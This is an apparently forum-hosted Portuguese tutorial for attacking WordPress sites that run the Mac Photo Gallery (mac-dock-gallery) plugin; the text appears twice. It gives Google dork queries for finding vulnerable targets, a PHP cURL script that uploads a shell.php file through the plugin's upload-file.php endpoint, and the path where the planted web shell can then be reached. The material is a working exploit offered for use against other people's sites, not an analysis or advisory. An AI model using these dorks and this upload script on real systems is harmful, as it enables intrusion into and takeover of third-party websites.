[Tutorial] Exploit WP (Plugin MacPhoto)
Página 1 de 1
[Tutorial] Exploit WP (Plugin MacPhoto)
Olha eu aqui denovo
Agora é um exploit pra tu upar shell em wordpress com o plugin Mac Photo Gallery instalado
é bem simples não tem erro esse.
Tu vai la no google e digita
inurl:wp-content/plugins/mac-dock-gallery/
Beleza após isso vai aparecer o teu alvo e a foto
dai tu adiciona isso
[b]inurl:wp-content/plugins/mac-dock-gallery/upload-file.php
Se tiver essa página é porque o site WP está VULL
No upload-file adicione esse script
<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\shell.php";
$c = curl_init("http://127.0.0.1/wordpress/wp-content/plugins/mac-dock-gallery/upload-file.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$u",
'albumId'=>"1",
'mode'=>"image"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>
Beleza a shell vai ser upada.
Ela se encontrará aqui ó
wp-content/uploads/mac-dock-gallery/shell.php
Não se esqueça clique no +
Agora é um exploit pra tu upar shell em wordpress com o plugin Mac Photo Gallery instalado
é bem simples não tem erro esse.
Tu vai la no google e digita
inurl:wp-content/plugins/mac-dock-gallery/
Beleza após isso vai aparecer o teu alvo e a foto
dai tu adiciona isso
[b]inurl:wp-content/plugins/mac-dock-gallery/upload-file.php
Se tiver essa página é porque o site WP está VULL
No upload-file adicione esse script
<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\shell.php";
$c = curl_init("http://127.0.0.1/wordpress/wp-content/plugins/mac-dock-gallery/upload-file.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$u",
'albumId'=>"1",
'mode'=>"image"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>
Beleza a shell vai ser upada.
Ela se encontrará aqui ó
wp-content/uploads/mac-dock-gallery/shell.php
Não se esqueça clique no +
Tópicos semelhantes
» [Tutorial] Exploitar phpBB (plugin mypage)
» [Tutorial] Exploit WP Type Manager File Upload
» [Exploit] Apache Tomcat
» [tutorial] basico em css
» [tutorial] namespace
» [Tutorial] Exploit WP Type Manager File Upload
» [Exploit] Apache Tomcat
» [tutorial] basico em css
» [tutorial] namespace
Página 1 de 1
Permissões neste sub-fórum
Não podes responder a tópicos